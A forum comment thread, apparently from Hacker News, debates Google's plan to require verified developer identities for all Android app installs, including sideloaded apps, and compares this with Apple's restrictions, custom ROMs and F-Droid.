We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
PokedBear · 3h ago
It will be interesting to see how they handle packages from the various f-droid repos. F-droid builds and signs all their apps themselves, so will all of f-droid be covered by a single signing key and developer account? Or will the fact that they take apps from lots of folks bar them from an account?
black3r · 3h ago
F-Droid generates a unique key for each app and that key is then reused for all builds of that app. This will probably just require registering the F-Droid public key to the package name with Google.
logicchains · 3h ago
I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
DangitBobby · 3h ago
Unless I misunderstood the question, this is covered in TFA
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
vetrom · 2h ago
You have misunderstood the question, or perhaps buried the lede. 'Open in that regard' is tantamount to not open at all. If you gatekeep being able to load an app to an Android phone behind these processes, you're essentially stuck with no recourse if you, say, have a banned google account, or have some reason you don't wish to send your government ID to these companies.
donmcronald · 2h ago
It also makes sure you only get one ID for life. There’s no creating a second account if you get banned because they’ll (likely at some point) collect biometric data as part of the verification process.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
throw-the-towel · 1h ago
Who's going to break them down? The governments also want this.
DangitBobby · 2h ago
I was responding to this:
> I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
I wasn't trying to claim everything is hunky dory, just that they aren't "going to just ban" other app stores.
MostlyStable · 2h ago
How does that jive with this statement:
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
DangitBobby · 2h ago
Does that amount to "just ban[ning]" other app stores? If not then... it jives fine? Not here to say it's a good thing.
hyperhopper · 2h ago
Your own quote shows the source of the confusion. OC was asking how will google handle apps that have somebody else signing for them. Your quote talks about letting devs that go through a verification process still side load (though that has no real benefit at that point since google still holds control over you)
cesarb · 2h ago
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
coastalpuma · 1h ago
We shouldn't accept "sideloading" as a term. It's meant to make "installing an app without monopolist approval" seem like a dirty/weird/niche trick.
Google can't even stop the scam ai companion apps on the play store that all use the same same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
climb_stealth · 38s ago
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
PRSXFENG · 1h ago
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steals your data and serves nonstop pop up ads
seanw444 · 2h ago
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
IlikeKitties · 1h ago
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
cesarb · 1h ago
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
nicce · 2m ago
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one the few phone manufacturers who can’t make emergency calls to work. (e.g. search Pixel problems)
Yokolos · 4h ago
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
jajuuka · 2h ago
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
hollow-moe · 4h ago
They saw Apple getting away with notarization under the DMA so they're doing the same.
I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
NelsonMinar · 3h ago
Android's ability to run binaries outside of the Google Play Store is a key differentiator of their product vs. Apple's. Or at least it used to be.
jajuuka · 2h ago
I think this is another thing that has changed in time. Custom ROM's used to be the defining feature of Android but over time less and less people used it. I think sideloading has gotten to that point as well. Where it's a power user feature that most people don't touch. So Google feels confident in nixing it since it only affects a small group of people.
fluoridation · 1h ago
Fewer people use custom ROMs not necessarily because they don't want to, but because manufacturers began putting hardware on the phones that only they have the firmware for. I have a Samsung phone that I replaced as my daily driver because the phone speaker broke from sweat. Other than the speaker it works literally perfectly. I'd love to use it to try different alternative OSs, but AFAIK, even though it's only from 2021, not a single project supports it.
zrobotics · 1h ago
I mean, the epic games lawsuit specifically involved sideloading. There's still ongoing litigation in one of those suits. Playing fortnite isn't exactly a niche or power user thing.
RadiozRadioz · 2h ago
Unfortunately, it's not a differentiator at all in the market. Not to enough consumers that it remotely matters. For our niche nerdy subculture it's extremely important, but essentially nobody in the grand scheme of things even knows that binary is a thing that exists.
GZGavinZhao · 1h ago
Still is, all of those Chinese ROMs/phone manufacturers thriving because of this. The Chinese phone market would literally be non-existent if it weren't for the ability to run binaries outside of Google Play.
Zak · 5h ago
The core benefit of Android over iOS for me has always been that it's my device, not Google's.
They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
gpm · 3h ago
Google is doing everything in their power to make me move to an iphone... between shit like this, effectively bricking some old models of pixels with un-rollbackable patches that destroy batteries, closing down the android development process, making absurd testing requirements to publish apps, etc.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
thayne · 3h ago
As mentioned in OP, Apple is doing the same thing.
gpm · 3h ago
I'm aware, I'm saying Google is trending towards being as abusive with their software practices as Apple already is, not worse.
And saying that for me anyways the only reason I have an Android and not an IPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
delfinom · 45m ago
Apple's hardware quality is pretty solid. Using Apple's software is basically an exercise in being a sub.
I have a stroke everytime I try to navigate settings on a iPhone each time someone asks. It's like they don't want you to try and change anything, ever.
ryukoposting · 2h ago
Precisely. If I can't control what I put on my Android phone anymore, I no longer have any reason to use an Android. iPhones have normal USB ports now, and that was the other big barrier.
Klonoar · 2h ago
> Google doesn't make better phones, they were just less hostile to the consumer.
And the person you're responding to was pretty clear that the issue if they both do the same thing, Google has no edge in devices.
celsoazevedo · 1h ago
If both systems are similar in terms of features and freedom, then I might as well choose the one that tracks me less and offers a more polished experience.
throw_m239339 · 2h ago
> As mentioned in OP, Apple is doing the same thing.
The thing is that if Google choses to make Android OS as closed as iOS, I'd rather use an iPhone than an Android phone...
james2doyle · 3h ago
Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
tgsovlerkhgsel · 3h ago
Apple throttled devices that had a weak battery, because the alternative is the CPU trying to draw more power than the battery can deliver, the voltage sagging, and the phone rebooting.
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
GeekyBear · 2h ago
The Nexus 6P had the same issue with random shutdowns, and although Google refused to do anything about it some users on XDA developed a patch that disabled all the performance cores completely.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
Funny how no one really complained about the random reboots but everyone noticed throttling and assumed their phone was "too old" and they needed to buy a new one. Interesting how this move greatly benefited apples bottom line versus improving actual quality of life for the user considering a reboot is 30 seconds perhaps and a slow phone is slow for every second you use it.
james2doyle · 2h ago
Understood. Poor wording on my part!
nicce · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery
It wasn’t guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have choice to opt-out.
makeitdouble · 2h ago
There was the opt-out part, but also the complete silence around the issue that comforted people into thinking they needed new phones every 2 years instead of just replacing the battery.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
to11mtm · 2h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
It's not about 'saving battery' its about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
GeekyBear · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
It's not a bug or issue with those phones, it's how batteries behave -- over time, they lose both their capacity and the power they output. Apple decided to throttle their phones via software instead of letting them crash.
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
Manuel_D · 3h ago
No, the batteries had degraded to the point that they could not supply enough voltage and current to stably run the chip at full frequency. Replacing the battery would restore full performance.
zaphirplane · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
That’s not a true story.
croes · 3h ago
Is sideloading a thing on iOS?
jajuuka · 2h ago
Yep, available to anyone. It's much more restrictive though. Basically you need a valid developer certificate to sign apps. You can use your own with a free developer account but you only get so many tokens per week and apps need to have their tokens refreshed weekly.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. EU has different system where there is no limit on amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also have a EU specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
Zak · 3h ago
In legal jurisdictions where Apple is forced to allow it, yes. They have a similar scheme for requiring developers to register and are demanding per-install fees for popular apps, though I'm not sure that will survive regulatory scrutiny in the EU.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
nicce · 3h ago
> and has to be repeated every few days.
7 days for free account.
1 year for paid (until membership ends?).
90 days for TestFlight.
miladyincontrol · 2h ago
Worth adding on there are methods to update signatures, altstore being one example
Although using their app to help automate that then takes up one the app slots for free accounts
viktorcode · 3h ago
There's a technical possibility, but it's not a thing, as in there's not a lot of iPhone users interested in that
kachapopopow · 3h ago
Yes******
* Only in europe
** kinda
*** you have to enable it in your account settings
**** you have to reinstall it every 30 days
***** more I forgot
****** fuck you - apple
kykat · 4h ago
What was the last time there were some actually good news in big tech? For those that don't hold stocks I mean.
cesarb · 1h ago
> What was the last time there were some actually good news in big tech?
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
hnpolicestate · 4h ago
We're in the era of less control, more surveillance, more "security", more being treated like a child and lied to.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
donmcronald · 2h ago
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
ohdeargodno · 37m ago
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
donmcronald · 2h ago
Last week. The bags I’m holding for Intel got a little lighter. Lmao.
Dragon0 · 1h ago
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
greenavocado · 1h ago
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillence cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in a easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that you nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
steve_taylor · 1h ago
Or just don't give your home address to Google.
fluoridation · 57m ago
What do you mean by "Google posted my name and address"? How? Why?
jadamson · 47m ago
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
I cannot resist the urge to point out that we wouldn't have had this problem if people actually sticked to free software instead of "commercial use friendly" open source licensing
merelysounds · 1h ago
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
josephcsible · 20m ago
Sure, but just the regular GPLv3 would have been good enough to prevent this particular abuse.
asdff · 2h ago
Free choice in the market is a lie anyhow. You are limited by what is actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
tannhaeuser · 44m ago
Except Android is based on Linux.
pbasista · 2h ago
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
ycombinatrix · 4h ago
This is crazy. I can't install my own apps on my own phone anymore.
I am gonna start carrying around a laptop with a 5G modem instead.
dingdingdang · 3h ago
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all it's various apps that I trust to varying degrees.
donmcronald · 2h ago
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
A4ET8a8uTh0_v2 · 1h ago
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
UnreachableCode · 2h ago
I'm curious why you need a phone for banking at all, at home as you say. Wouldn't a laptop suffice? Granted, not all banks have a web app these days
reorder9695 · 2h ago
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
GeoAtreides · 1h ago
ding ding ding a second phone is the correct answer
Tadpole9181 · 2h ago
Don't worry, they'll stop letting you access your bank without an app soon enough. Gotta protect the children and what-not.
dugite-code · 46m ago
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
owebmaster · 1h ago
That's indeed what I'm planning to do but I'll buy a Steam Deck
zmmmmm · 2h ago
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
bpev · 3m ago
I see... I guess it's just... web apps then?
the_wolo · 1h ago
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
9cb14c1ec0 · 4h ago
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
xenago · 1h ago
That's exactly the goal
sebastiennight · 2h ago
So what are our options (eg for EU citizens) for lobbying in terms of legislation or directly to Google to show disagreement with this?
It looks like many in this thread are against, but I don't see suggestions for action?
derbOac · 1h ago
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
0x000xca0xfe · 4h ago
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
CrimsonCape · 1h ago
A linux-based phone... with an 18650 battery slot... with a keyboard... and a meshtastic radio... drool.
int_19h · 33m ago
Phones are hard because of certification requirements.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
lucb1e · 1h ago
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to copy the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
0x000xca0xfe · 3h ago
There has to be a threshold where enshittification has been pushed so far that nerd software becomes the thing cool kids boast about running.
Where a less restricted device can do cool things nobody else can do.
Retr0id · 3h ago
These days I don't really want a smartphone at all, but begrudgingly use one for things like mobile banking, receiving SMS tokens, etc.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
WhyNotHugo · 3h ago
Sounds like you want a laptop with a built-in LTE modem running Android inside a VM.
Retr0id · 3h ago
A laptop is far too big, and banking apps and the likes would refuse to run in your VM.
A4ET8a8uTh0_v2 · 1h ago
Hmm, don't banking apps run in emulators without much hassle? I am seeing a project on a horizon lol.
metalman · 2h ago
The set up I run consists of an older 5g phone that hospots to my other phone, no apps of consiquence on either phone, I sign into my email through web mail, and sign into banking through a browser, all of my apps come from fdroid and similar, mostly used for media, manual updates for those through the fdroid web site.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mic's and cameras, likely the gps, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch.
* use matched resistors, or black out the sensors
detach the antena for gps
lets just say I realy dont like bieng advertised to
zappb · 3h ago
Mobile phone platforms are reverting back to the pre-iOS/Android reality where you have to jump through tons of hoops to even make an app let alone run a viable business with it.
IshKebab · 3h ago
I don't recall having to send government ID to any companies to publish MIDlets back in the day. I just uploaded them to getjar.
int_19h · 31m ago
AFAIK in some countries (US?) phones were usually sold locked in a sense that you could only install J2ME midlets published by your mobile provider, who'd nickel and dime both users and devs for the privilege.
lykahb · 2h ago
I have good memories about a website with ELF's for the Siemens phones. Its name had "kebab" in it. By any chance, was it you running it?
majestik · 5m ago
Google welcome to Apple 10 years ago
mrbluecoat · 2h ago
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
aucisson_masque · 2h ago
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
3036e4 · 2h ago
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
aucisson_masque · 2h ago
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
int_19h · 28m ago
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
Night_Thastus · 2h ago
>At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
A4ET8a8uTh0_v2 · 1h ago
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not a Apple fan either.
moogly · 3h ago
Well, I guess I didn't want to use half of the apps on my phone anyway.
Might as well throw the phone in the bin.
sitkack · 2h ago
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
malkia · 4h ago
What would happen to projects like F-Droid, Termux, etc.?
gruez · 4h ago
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
Guess whether the makers of alternative YouTube clients will want to tell Google, "Hey, this is a copy of our ID card our address"...
grizzles · 1h ago
This must be because of Epic's win in antitrust court.
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
de6u99er · 25m ago
>However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option.
Don't be evil Google!
PenguinCoder · 4h ago
The new face of Embrace, Extend, Extinguish.
subarctic · 2h ago
Hmm this is weird. I've recently been considering switch back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
Dilettante_ · 3h ago
Hopefully this increases the communal pressure to find a real alternative to android.
edgarvaldes · 2h ago
Sideloading is the only reason I'm on Android. When it goes away, I will be better with an Apple device.
occz · 4h ago
That's not a good move at all.
DarkmSparks · 1h ago
Well that sucks. So basically all the money weve had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
Whose smart idea was that.
zhyder · 52m ago
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'
Pfhortune · 3h ago
Disgusting, horrifying, but utterly predictable. A dark day indeed, once no major mobile platform allows running whatever code you wish. Sideloading isn't really sideloading if the app has to be signed by the gatekeeper.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
celsoazevedo · 1h ago
This would affect a lot apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
BLKNSLVR · 1h ago
Can Google do something like this for entities wishing to advertise on their platform?
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
rep_wex · 7h ago
Google to make sideloading Android apps _harder_ by _force_ verifying developer identity for 25$ and bunch of legal documents.
jajuuka · 5h ago
If you read the article you'd see that this is a separate account type that does not have a submission fee or require legal documents. It also doesn't prevent you from side loading. It's just part of the current scare screen system when it comes to side loading.
rep_wex · 4h ago
> separate account type that does not have a submission fee or require legal documents
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting app installation threshold for let say 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
ohdeargodno · 5h ago
The only promises on the announcement are:
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number.
> * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website.
> * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
Then you're familiar with the process of getting a DUNS number. Because that is a massive barrier for individual devs and small teams. That is actual legal paperwork. Not having to do that makes the process significantly easier.
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
ohdeargodno · 4h ago
It. Doesn't. Matter.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
jajuuka · 4h ago
So then don't. Are you seriously scared for the revanced devs? Their code is posted on Github. Their accounts are all public accounts with names and locations. Maybe don't white knight people who don't need it.
aucisson_masque · 2h ago
You failing to see the issue and dismissing is so easily is mind blowing. Revanced is nothing, he is referring to a whole ecosystem of app made by randomn for other random that Google should have no business requiring government id and giving approval.
